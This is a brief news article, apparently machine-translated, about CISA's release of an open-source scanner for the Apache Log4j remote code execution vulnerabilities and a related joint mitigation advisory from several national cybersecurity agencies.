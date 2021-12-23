The Cybersecurity and Infrastructure Security Agency (CISA) has announced the launch of a scanner to identify web services affected by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

“This repository provides a scanning solution for log4j remote code execution vulnerabilities (CVE-2021-44228 and CVE-2021-45046). The information and code in this repository is provided "as is" and was brought together with the help of the open source community and updated by CISA in collaboration with the cybersecurity community in general. "- can be read in the description of the draft.

We published an open-sourced log4j-scanner derived from scanners created by other members of the open-source community. This tool is intended to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities: https://t.co/af8uszW8K4 – Cybersecurity and Infrastructure Security Agency (@CISAgov) December 21, 2021

The tool allows security teams to scan files hosts Search for exposure to Log4j RCE and detect web application firewall (WAF) bypasses that may allow code to run within your organization’s environment.

CISA highlights the following features on the project page log4j-scanner:

Support for lists of URLs.

Fuzzing for more than 60 HTTP request headers (not just 3-4 headers like the tools seen above).

Fuzzing for HTTP POST data parameters.

Fuzzing for JSON data parameters.

Supports DNS callback for vulnerability discovery and validation.

WAF Bypass payloads.

Capture of log4j-scanner | Fountain: GitHub

Joining forces against Log4j.

Apart from this tool, the Infrastructure and Cybersecurity Security Agency (CISA), the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Australian Center for Cyber ​​Security (ACSC), the Canadian Center for Cyber ​​Security (CCCS), the New Zealand Computer Emergency Response Team (CERT NZ), the New Zealand National Cyber ​​Security Center (NZ NCSC) and the UK National Cyber ​​Security Center (NCSC-UK) have issued a joint notice to provide a mitigation guide to address vulnerabilities in Apache’s Log4j software library: CVE-2021 -44228 (known as “Log4Shell”), CVE-2021-45046 and CVE-2021-45105.

